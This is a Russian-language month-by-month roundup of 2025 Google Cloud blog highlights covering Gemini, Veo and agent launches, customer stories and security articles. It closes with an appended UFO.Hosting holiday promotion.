До этого момента перспективы генеративного ИИ в основном были связаны с текстом и кодом. Запуск Veo 3 изменил все. Разработчики, создающие и развертывающие приложения ИИ, восприняли доступность графических процессоров в Cloud Run как большую удачу, и мы продолжили нашу неуклонную работу над инновациями Gemini с помощью 2.5 Flash и Flash-Lite. Мы также поделились своими мыслями о защите агентов ИИ. А чтобы узнать, как на самом деле создавать этих агентов, читатели обратились к статьям о Box, британской компании по недвижимости Schroders и французском люксовом конгломерате LVMH (владельце Louis Vuitton, Channel, Sephora и других).
Вы мечтаете об этом, Veo воплощает это в жизнь: Veo 3 теперь доступен для всех в режиме публичного предварительного просмотра на Vertex AI.
Технология Cloud Run GPUs, теперь доступная для всех, упрощает выполнение задач искусственного интеллекта.
Успех Gemini продолжается с выпуском 2.5 Flash-Lite и появлением в продаже версий 2.5 Flash и Pro на Vertex AI.
Лидерство мнений

• Спросите OCTO: Как разобраться в работе агентов искусственного интеллекта
• Мнение руководителей служб информационной безопасности облачных сервисов: как Google обеспечивает безопасность агентов искусственного интеллекта.

Истории клиентов

• Секрет интеллектуального анализа документов: Box создает улучшенные агенты извлечения данных с использованием фреймворка A2A.
• Как компания Schroders создала своего многоагентного помощника для финансового анализа и исследований
• Внутри идеально ухоженной базы данных LVMH, где зарождаются роскошные агенты искусственного интеллекта.

Июль
Читатели отвлеклись от темы ИИ, чтобы почитать о сетевой инфраструктуре — а точнее, о новом трансатлантическом кабеле Sol. Затем они вернулись к ИИ: новые модели генерации видео в Vertex; важнейший компонент для создания агентов с сохранением состояния и учетом контекста; и новый набор инструментов для подключения данных BigQuery к средам Agent Development Kit (ADK) и Multi-Cloud Protocol (MCP). Разработчики приветствовали интеграцию Cloud Run и Docker Compose, а руководители компаний с удовольствием ознакомились со списком практических применений агентов ИИ в реальном мире.

В этом месяце мы вернулись к основам безопасности, изучив сохранение некоторых проблем безопасности облачных сервисов. А затем снова вернулись к искусственному интеллекту, представив нашего агента Big Sleep. Читателей также заинтересовало, как ИИ упрощает ведение документации для медсестер в HCA Healthcare, инициативы Ulta Beauty по хранению данных и ведению документации с помощью мобильных устройств, а также переход SmarterX с Snowflake на BigQuery.

Повышение отказоустойчивости сети с помощью трансатлантического кабеля Sol.
Veo 3 и Veo 3 Fast теперь общедоступны на Vertex AI.
Анонсируем доступность банка памяти Vertex AI Agent Engine Memory Bank для всех пользователей в режиме предварительного просмотра.
BigQuery и ADK и MCP: ускорьте разработку агентов с помощью нового набора инструментов от BigQuery.
От локального сервера до запуска: упростите развертывание приложений ИИ с помощью Cloud Run и Docker Compose.
Лидерство мнений

• Безопасное облако. Небезопасное использование. (И что с этим можно сделать)
• Наш агент из компании Big Sleep совершил большой рывок.

Истории клиентов

• Как медсестры определяют будущее искусственного интеллекта в крупнейшей сети больниц Америки, HCA Healthcare.
• Ulta Beauty переосмысливает розничную торговлю косметикой с помощью BigQuery.
• Переход SmarterX с Snowflake на BigQuery ускорил создание моделей и сократил затраты вдвое.

Август
Искусственный интеллект — это ресурсоемкий и энергоемкий процесс; в новом техническом документе мы опубликовали конкретные данные о потреблении энергии нашей инфраструктурой ИИ. Затем все пришли в восторг от Gemini 2.5 Flash Image на Vertex AI, и разработчики, имея в своем распоряжении множество технических чертежей, приступили к работе над своими проектами в области ИИ. Летнее затишье не помешало нашим экспертам по безопасности заняться серьезной проблемой кибермошенничества. Мы также внимательно изучили конкретные инструменты, используемые агентами в Wells Fargo, и то, как Keeta обрабатывает 11 миллионов блокчейн-транзакций в секунду с помощью Spanner.

Сколько энергии потребляет искусственный интеллект Google? Мы произвели расчеты.
Создание визуализаций нового поколения с помощью Gemini 2.5 Flash Image (он же nano-banana) на платформе Vertex AI.
Более 101 варианта использования ИИ нового поколения с техническими схемами.
Лидерство мнений

• В отчете New Threat Horizons подробно описываются меняющиеся риски и способы защиты от них.
• Как руководители служб информационной безопасности и советы директоров могут помочь в борьбе с мошенничеством, совершаемым с использованием киберпреступлений.
• Как прогнозирование погоды на основе искусственного интеллекта может изменить работу энергетических компаний

Истории клиентов

• Как Wells Fargo использует Google Cloud AI для расширения возможностей своих сотрудников с помощью инструментов для управления персоналом
• Как Киита обрабатывает 11 миллионов финансовых транзакций в секунду в блокчейне с помощью Spanner

Сентябрь
Искусственный интеллект — это крутая технология, но как её монетизировать? Один из ответов — протокол агентских платежей (AP2). Разработчики и специалисты по обработке данных, готовящиеся к внедрению ИИ, активно изучали блоги о новых предложениях в области облачных вычислений, отчете DORA за 2025 год и новых обучающих программах. Руководители компаний внимательно изучали наши идеи по построению агентской стратегии работы с данными и делали заметки о лучших способах запуска использования ИИ. И поскольку эра ИИ затрагивает всех, включая руководителей предприятий, мы объяснили, что значит быть «двуязычным» в области ИИ и безопасности. Затем на форуме Google AI Builders Forum стартапы рассказали, как ИИ, инфраструктура и сервисы Google поддерживают их рост. Не остались в стороне и такие предприятия, как Target и Mr. Cooper, которые также продемонстрировали свои возможности в области ИИ.

Развитие коммерции с использованием искусственного интеллекта с помощью нового протокола агентских платежей (AP2)
Новый специалист по анализу данных: от аналитика к архитектору агентов.
Представляем доклад DORA за 2025 год: Состояние разработки программного обеспечения с использованием искусственного интеллекта.
Возвращаемся в школу ИИ: новый курс обучения от Google Cloud, который обеспечит вам навыки работы с ИИ в будущем.
Лидерство мнений

• Создание более совершенных платформ данных для ИИ и не только.
• Для получения конкурентного преимущества советам директоров следует быть «двуязычными» в области ИИ и безопасности.
• Руководство для руководителей по пяти основным вопросам искусственного интеллекта

Истории клиентов

• Как технологический стек Google Cloud в области искусственного интеллекта помогает современным стартапам
• От запроса до корзины: подробности обновления поисковой строки Target с помощью AlloyDB AI.
• Как г-н Купер собрал «команду» агентов искусственного интеллекта для решения сложных вопросов, связанных с ипотекой.

Октябрь
Добро пожаловать в эру Gemini Enterprise, которая предоставляет крупным организациям улучшенную безопасность, контроль данных и расширенные возможности агентов. Чтобы помочь вам подготовиться, мы перезапустили ряд улучшений нашей обучающей платформы и добавили новые программы по коммерции и безопасности. Пока разработчики изучали тонкости подсказок Veo, мы обсуждали обеспечение безопасности цепочки поставок ИИ, создание агентов ИИ для кибербезопасности и обороны, а также новое видение моделирования экономических угроз. Мы сотрудничали с PayPal, чтобы обеспечить коммерцию в чатах с ИИ, немецкий Институт Планка показал, как ИИ может помочь в обмене глубокими научными знаниями, а DZ Bank разработал новаторские способы повышения надежности финансов на основе блокчейна.

Представляем Gemini Enterprise
Google Skills: Ваш новый дом для облачного обучения
Обеспечение безопасной работы веб-платформы с помощью reCAPTCHA
Партнеры, обеспечивающие работу агентской экосистемы Gemini Enterprise.
Лидерство мнений

• Полное руководство по подсказкам для Veo 3.1
• Как обеспечить безопасность цепочки поставок ИИ
• Как это делает Google: создание агентов искусственного интеллекта для кибербезопасности и защиты.

Истории клиентов

• Представляем решение для автоматизированной электронной коммерции от PayPal и Google Cloud для продавцов.
• Как Институт Макса Планка делится экспертными знаниями с помощью мультимодальных агентов
• Оракулы DeFi: как DZ Bank создает надежные потоки данных для децентрализованных приложений

Ноябрь
Будь то Gemini 3, Nana Banana Pro или наши TPU Ironwood седьмого поколения, в этом месяце мы предоставили корпоративным клиентам доступ ко всем нашим новейшим и лучшим технологиям в области искусственного интеллекта. Мы также подробно рассказали о том, как создали крупнейший в истории кластер Kubernetes, насчитывающий 130 000 узлов, и объявили о новом сотрудничестве с AWS для улучшения связи между облаками.

Тем временем мы обновили наши выводы о злонамеренном использовании ИИ со стороны злоумышленников и о рентабельности инвестиций в ИИ для обеспечения безопасности, а руководители компаний высоко оценили нашу статью о программировании атмосферы. Затем, как раз к праздникам, мы рассмотрели, как Mattel использует инструменты ИИ для обновления своих игрушек, а Waze показал, как компания использует Memorystore для поддержания потока трафика в праздничный сезон.

Внедрение Gemini 3 в корпоративную среду
Как это делает Google: создание крупнейшего из известных кластеров Kubernetes, насчитывающего 130 000 узлов.
Представляем Nano Banana Pro для всех строителей и предприятий.
Анонсируем общедоступность Ironwood TPU и новых виртуальных машин Axion для развития вычислительной техники.
AWS и Google Cloud сотрудничают для упрощения работы в многооблачных сетях.
Лидерство мнений

• Последние достижения в использовании инструментов искусственного интеллекта злоумышленниками
• За кулисами ажиотажа: анализ новых данных о рентабельности инвестиций в ИИ в сфере безопасности.
• Как кодирование атмосферы может помочь лидерам действовать быстрее

Истории клиентов

• Революционное решение от Mattel: как искусственный интеллект превращает отзывы клиентов в обновления продуктов в режиме реального времени.
• Waze обеспечивает бесперебойную работу дорожной сети благодаря более чем 1 миллиону считываний данных в реальном времени в секунду из Memorystore.

Декабрь
Год подходит к концу, но нам еще многое предстоит рассказать. Первые результаты показывают, что вас интересовали способы устранения уязвимости React2Shell, поддержка MCP во всех сервисах Google, а также запуск раннего доступа к AlphaEvolve. И не будем забывать о Gemini 3 Flash, который привлекает внимание своей высокоуровневой логикой, потрясающей скоростью и гибким профилем стоимости.

Что всё это значит для вас и вашего будущего? Важно понимать контекст этих технологических разработок, особенно в области ИИ. Например, команда DORA подготовила руководство о том, как высокоэффективные команды, работающие с платформами, могут интегрировать возможности ИИ в свои рабочие процессы, мы обсудили, как выглядит рабочая сила, готовая к использованию ИИ, а наши коллеги из Управления директора по информационной безопасности опубликовали свои прогнозы по кибербезопасности на 2026 год. Более того (защитник), вы могли бы поступить, как Стефен Карри из «Голден Стэйт Уорриорз», и обратиться к Gemini для анализа своей игры, чтобы подготовиться к предстоящему году. Мы будем следить за тем, как Стеф справится с советами Gemini в Рождество.

Ответ на уязвимость React2Shell (CVE-2025-55182): Обеспечьте безопасность ваших рабочих нагрузок React и Next.js.
Объявляем о поддержке протокола контекста модели (MCP) для сервисов Google.
AlphaEvolve на Google Cloud: ИИ для обнаружения и оптимизации агентов.
Представляем Gemini 3 Flash: интеллект и скорость для предприятий.
Лидерство мнений

• От внедрения к результатам: применение модели возможностей искусственного интеллекта DORA на практике.
• Является ли владение навыками работы с ИИ необходимым компонентом или результатом подготовки квалифицированных кадров для этой области?
• Наш прогноз по кибербезопасности на 2026 год.

Истории клиентов

• Что Стефен Карри узнал о своей игре от специально созданного агента Gemini

Максимум стабильности и ресурсов — новогоднее предложение UFO.Hosting
Новый год — время запускать проекты на полную мощность. С 19 декабря по 8 января UFO.Hosting дарит беспрецедентные условия для масштабирования.

Будьте с нами на связи!
С уважением, команда ЮФО Хостинг.

https://ufo.hosting